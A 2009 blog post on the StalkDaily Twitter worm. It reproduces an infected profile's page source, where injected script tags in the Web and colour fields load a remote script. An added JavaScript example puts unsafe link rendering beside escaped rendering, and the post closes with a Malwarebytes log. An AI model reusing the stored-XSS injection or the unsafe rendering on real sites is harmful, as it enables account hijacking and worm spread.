
A Twitter virus shows up: StalkDaily

By CurtMonash on Sat, 04/11/09 - 5:31pm.

A Twitter virus has shown up.  Tweetstreams, including mine, send out the message:

Hey everyone, join www. StalkDaily. com. It's a site like Twitter but with pictures, videos, and so much more! :) 

(Of course, the URL link is live in the original.)

Update: Twitter now claims to have patched the hole that allowed the virus to spread. And I've posted a simpler version of the whole story.

Nobody seems to know yet exactly what is going on. is getting a lot of attention with advice to stop it, but basically just says "Change your password and clear your cookies and browser cache; that should work."

Some people are assuming the virus is contracted by actually visiting the site, but I'm sure I got it WITHOUT visiting the site.

I'll try to get more information here, in the main post or comment thread, when I can.

Edit: Mark Hawker is figuring out how this works, and updating the comment thread below. He's posting more detail yet in his own Twitter stream.

Edit: @pilot suggests disabling scripts via NoScript in Firefox. But this has painful side effects.

Edit: @anowheels thinks clicking on the GangsterBoy Twitter account can cause infection -- and I did click there right before getting hit. The theory is plausible for other reasons.

Specifically, there's a profile broken in a way I haven't seen before, looking like:

View Source right now gives:

<DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "">

<html xmlns="" xml:lang="en" lang="en">

<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="en-us" http-equiv="Content-Language" />
<meta content="Twitter is a free social messaging utility for staying connected in real-time" name="description" />
<meta content="no" http-equiv="imagetoolbar" />
<meta content="width = 780" name="viewport" />
<meta content="4FTTxY4uvo0RZTMQqIyhh18HsepyJOctQ+XTOu1zsfE=" name="verify-v1" />
<meta content="1" name="page" />
<meta content="IE=7" http-equiv="X-UA-Compatible" />
<meta content="y" name="session-loggedin" />
<meta content="11326952" name="session-userid" />
<meta content="CurtMonash" name="session-user-screen_name" />
<meta content="GangsterBoyHah" name="page-user-screen_name" />
<title>gangsterboy (GangsterBoyHah) on Twitter</title>
<link href="" rel="shortcut icon" type="image/x-icon" />
<link href="" rel="apple-touch-icon" />
<script type="text/javascript">
var page = {};

<link href="" media="screen, projection" rel="stylesheet" type="text/css" />
<link href="" media="screen, projection" rel="stylesheet" type="text/css" />
<style type="text/css">
/* begin custom css */
.top-navigation > li > a,
a { color: #0084B4; }
body {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
background-color: #9AE4E8;
background: #9AE4E8 url( fixed no-repeat top left;}
#side_base {
border-left:1px solid #BDDCAD;
background-color: #DDFFCC;
width: 199px; line-height: 1.2; -moz-border-radius-topright: 5px; -webkit-border-top-right-radius: 5px; -moz-border-radius-bottomright: 5px; -webkit-border-bottom-right-radius: 5px;
#side div.last { border-top: 1px solid #BDDCAD; }
ul#tabMenu li {
display: block; width: 100%;
border-top: 1px solid #BDDCAD;
ul#tabMenu li a, #side .section h1 { color:#script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }
#content tr.hentry:hover a { color:#0084B4; }
body#profile #content div.hentry:hover a { color:#0084B4;}
#side .actions { border: 1px solid #BDDCAD; }
#side .promotion {
border: 1px solid #BDDCAD;
text-align: left; font-size: 11px; margin-top: 7px; padding: 6px 10px; width: 152px;
#side .promotion .definition span {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
#side .promo { border: 1px solid #BDDCAD; }
#side .stats td+td {
border-left: solid 1px #BDDCAD;
border-right: solid 1px #BDDCAD;
#side div.section-header h1 { color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }
#side div.section-header h3.faq-header {
border-bottom: 1px solid #BDDCAD;
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;
#side .stat a {color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript; }

#side div.user_icon a, #side div.user_icon a:hover {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;

#side div.user_icon a:hover {
color: #0084B4;

#side .stats {
border-top: 1px solid #BDDCAD;

#side .stats a span.stats_count {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;

#side .stats a:hover span.stats_count {
color: #0084B4;

ul.sidebar-menu a b {
border-left: 5px solid #BDDCAD;

ul.sidebar-menu a {
color: #script srchttpmikeyylolzuuuqcomxjsscriptscript srchttpmikeyylolzuuuqcomxjsscript;

#side hr {
background: #BDDCAD;
color: #BDDCAD;

#side .stats td+td {
border-left: none;
border-right: none;

#side div.collapsible h2.sidebar-title {
background: transparent url('') no-repeat center right !important;
width: 155px;

#side div.collapsible.collapsed h2.sidebar-title {
background: transparent url('') no-repeat center right !important;

/* end custom css */

.content-bubble-arrow { background-image: url(; }
.status-btn input.round-btn { background-image: url(''); }
.status-btn input.round-btn:hover { background-image: url(''); }
.status-btn input.disabled, .status-btn input.disabled:hover { background-image: url(''); }
.hentry .actions .fav { background-image: url(''); }
.hentry .actions .non-fav { background-image: url(''); }
.hentry .actions .fav-throb, .hentry .actions a.del-throb { background-image: url(''); }
.hentry .actions .del { background-image: url(''); }
body#show .reply, .hentry .actions .reply { background-image: url(''); }
.direct_message .actions .reply { background-image: url(''); }
.direct_message .actions .del { background-image: url(''); }
.notify { background-image: url(''); }
.promotion, ul#tabMenu a#keyword_search_tab.hover, ul#tabMenu a:hover { background-image: url(''); background-color: transparent; }
div#follow-toggle.closed { background-image: url(''); }
div#follow-toggle.opened { background-image: url(''); }
.follow-actions .following { background-image: url(''); }
.loading { background-image: url(''); }
.more { background-image: url(''); }
.more.loading { background-image: url(''); }
body#show .protected { background-image: url(''); }
#side .promotion { background-image: url(''); }
.rss { background-image: url(''); }

.bulletin a.close { background: transparent url('') no-repeat; }
ul.sidebar-menu a { font-weight: bol d; color: #333; background: url(''); }
ul.sidebar-menu li:hover a { text-decoration: none; background: url(''); }
#sidebar_search_submit { background: url('') -2px 0px !important ; }
#sidebar_search_submit:hover { background: url('') -2px -25px !important; }
#sidebar_search_submit:active { background: url('') -2px -50px !important; }
#sidebar_search_submit.loading, #sidebar_search_submit.loading:hover, #sidebar_search_submit.loading:active { background: #eee url('') no-repeat 5px 5px !important; }
#side .collapsible.loading h2.sidebar-title { background: transparent url('') no-repeat center right; }
#side .collapsible h2.sidebar-title {
background: transparent url('') no-repeat center right;
width: 155px;

#side .collapsible.collapsed h2.sidebar-title {
background: transparent url('') no-repeat center right;


<body class="account firefox-windows" id="profile">
<div id="dim-screen"></div>
<ul id="accessibility" class="offscreen">
<li><a href="#content" accesskey="0">Skip past navigation</a></li>
<li>On a mobile phone? Check out <a href=""></a>!</li>
  <li><a href="#footer" accesskey="2">Skip to navigation</a></li>
<li><a href="#tabMenu" accesskey="3">Jump to the sidebar</a></li>
<li><a href="#signin">Skip to sign in form</a></li>

<div id="container" class="subpage">
<span id="loader" style="display:none"><img alt="Loader" src="" /></span>

<h1 id="header">
    <a href="/home" title="Twitter: home" accesskey="1" id="logo">
<img alt="" height="36" src="" transparent_png="true" width="155" />

<div class="content-bubble-arrow"></div>

<table cellspacing="0" class="columns">
<td id="content" class="round-left column">
                                <div class="wrapper">

<div class="profile-head">
<h2 class="thumb">
<img alt="" class="profile-img" height="73" src="" width="73" /> GangsterBoyHah
<div class="clear"></div>

<div class="protected-box">
<table><tr><td><br /><img alt="Padlock_large" src="" /></td>
<td><h1>This person has protected their updates.</h1>

<br />
<span class='sub-h1'>You need to send a request before you can start following this person.</span>
<form action="friendships/create/30519351" method="post"><div style="margin:0;padding:0"><input name="authenticity_token" type="hidden" value="5072bac31fff2d4527bccf68cf6c48d16f1c6735" /></div> <input id="send_request" name="commit" type="submit" value="Send request" />
        </center><br />




<td id="side_base" class="column round-right">

<div id="side">

<div id="profile" class="section">
<span class="section-links">

<img src="" title="This user&rsquo;s updates are protected."/>
<ul class="about vcard entry-author">
<li><span class="label">Name</span> <span class="fn">gangsterboy</span></li>
<li><span class="label">Location</span> <span class="adr">Google</span></li>
                    <li><span class="label">Web</span> <a href="http://"><script src=""></script><script src=""></script><a " class="url" rel="me nofollow">http://"><script ...</a></li>


<div class="stats">

<a href="/GangsterBoyHah/friends" id="following_count_link" class="link-following_page" rel="me" title="See who you’re following">
<span id="following_count" class="stats_count numeric">903 </span>
<span class="label">Following</span>


<a href="/GangsterBoyHah/followers" id="follower_count_link" class="link-followers_page" rel="me" title="See who’s following you">
<span id="follower_count" class="stats_count numeric">2 </span>
<span class="label">Followers</span>

<td><a href="/GangsterBoyHah" class="link-updates" title="See all your updates" rel="me"><span id="update_count" class="stats_count numeric">126</span><span class="label">updates</span>


<ul id="tabMenu">
<a href="/GangsterBoyHah" accesskey="u" id="updates_tab">Updates</a> </li>
<a href="/GangsterBoyHah/favourites" accesskey="f" id="favorites_tab">Favorites</a> </li>

<div class="section last">
<a href="/direct_messages/create/30519351">message</a> GangsterBoyHah

<a href="/blocks/confirm/30519351" style="color: grey;">block</a> GangsterBoyHah


<div id="people" class="section last">

<div id="following_list">

<span class="vcard">
<a href="" class="url" rel="contact" title="Noword"><img alt="Noword" class="photo fn" height="24" src="" width="24" /></a>

<span class="vcard">
<a href="" class="url" rel="contact" title="soychicka"><img alt="soychicka" class="photo fn" height="24" src="" width="24" /></a>

<span class="vcard">
<a href="" class="url" rel="contact" title="SWAGGRITE ENT."><img alt="SWAGGRITE ENT." class="photo fn" height="24" src="" width="24" /></a>




<div id="footer" class="round">
<h3 class="offscreen">Footer</h3>

<li class="first">&copy; 2009 Twitter</li>
<li><a href="/about#about">About Us</a></li>
<li><a href="/about#contact">Contact</a></li>
<li><a href="">Blog</a></li>
<li><a href="">Status</a></li>
<li><a href="/downloads">Apps</a></li>
<li><a href="">API</a></li>
<li><a href="">Search</a></li>
<li><a href="">Help</a></li>
<li><a href="/jobs">Jobs</a></li>
<li><a href="/tos">Terms</a></li>
<li><a href="/privacy">Privacy</a></li>

<hr />

<div id="navigation">
<ul class="horizontal-nav top-nav round" style="display:inline">
<li><a href="" accesskey="h" id="home_link">Home</a></li>
<li><a href="" accesskey="p" id="profile_link">Profile</a></li>
<li><a href="" accesskey="=" id="find_people_link">Find People</a></li>
<li><a href="/account/settings" accesskey="s" id="settings_link">Settings</a></li>
<li><a href="" accesskey="?" id="help_link">Help</a></li>
<li class="last">

<a id="sign_out_link" href="#" onclick="document.getElementById('sign_out_form').submit(); return false;">Sign out</a>


<form method="post" id="sign_out_form" action="/sessions/destroy" style="display:none;">
<input name="authenticity_token" value="5072bac31fff2d4527bccf68cf6c48d16f1c6735" type="hidden" />


<script src="" type="text/javascript"></script><script src="" type="text/javascript"></script><script src="" type="text/javascript"></script><script src="" type="text/javascript"></script><script src="" type="text/javascript"></script>
<script src="" type="text/javascript"></script><script type="text/javascript">
twttr.form_authenticity_token = '5072bac31fff2d4527bccf68cf6c48d16f1c6735';
if ( !== window.self) { setTimeout(function(){document.body.innerHTML='';},1);window.self.onload=function(evt){document.body.innerHTML='';};}
</script><script type="text/javascript">

$( function () {
$('body#profile ul#tabMenu li a#updates_tab, body#favourings ul#tabMenu li a#favorites_tab').isSidebarTab();




<!-- BEGIN google analytics -->

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "' type='text/javascript'%3E%3C/script%3E"));

<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-30775-6");
pageTracker._setVar('Logged In');
pageTracker._setVar('lang: en');
} catch(err) { }

<!-- END google analytics -->

    <div id="notifications"></div>
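In the source above, the profile's Web field closes the href attribute and opens script tags, and the custom colour values carry text that is not a colour. The following JavaScript is an added example, not code from the original post or from Twitter: it puts that kind of link rendering next to a validated, escaped version and adds a strict colour check. The function names and the example.invalid host are assumptions.

```javascript
// Added example, not Twitter's code: handling for the two profile fields
// (Web link, custom colours) that carry injected text in the source above.

// Escape characters that can end an attribute value or open a tag.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Before: the stored value is concatenated straight into the markup.
function renderWebLinkUnsafe(url) {
  return '<a href="' + url + '" class="url" rel="me nofollow">' + url + "</a>";
}

// After: accept only a parseable http(s) URL, then escape on output.
function renderWebLinkSafe(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch (e) {
    return ""; // unparseable value: render no link
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") return "";
  const safe = escapeHtml(parsed.href);
  return '<a href="' + safe + '" class="url" rel="me nofollow">' + safe + "</a>";
}

// Colours are written into a <style> block: allow exactly 3 or 6 hex digits
// and otherwise use a default, instead of trying to clean the value up.
function safeColor(value, fallback) {
  const m = /^#?([0-9a-fA-F]{3}|[0-9a-fA-F]{6})$/.exec(String(value));
  return m ? "#" + m[1] : fallback;
}

// Constructed input shaped like the broken Web field above;
// example.invalid is a placeholder host.
const storedUrl = 'http://"><script src="http://example.invalid/x.js"></script><a "';

console.log(renderWebLinkUnsafe(storedUrl)); // attribute closed, script tag live
console.log(renderWebLinkSafe(storedUrl));   // no script tag in the output
console.log(safeColor("0084B4", "#333333"));
console.log(safeColor("script srchttp", "#333333"));
```
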




Edit: A Malwarebytes scan comes up with three instances of malware.  One is the Seneka rootkit (ouch!).  I don't immediately know whether all three boil down to that. The logfile is below. I've bolded selectively.

Malwarebytes' Anti-Malware 1.36
Database version: 1969
Windows 5.1.2600 Service Pack 3

4/11/2009 6:49:38 PM
Malwarebytes log mbam-log-2009-04-11 (18-49-21)

Scan type: Full Scan (C:\|D:\|)
Objects scanned: 209851
Time elapsed: 34 minute(s), 30 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 2
Registry Values Infected: 0
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\cs41275 (Malware.Trace) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\seneka (Rootkit.Trace) -> No action taken.

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)



Searching on Seneka rootkit turns up very different pages than searching on cs41275, so I suspect them of being two different infections.

As of this posting I haven't yet sorted out what to DO about these infections, but there's advice on the Web, especially about Seneka.

At a guess they're unrelated to StalkDaily, but I can't be sure at the moment.
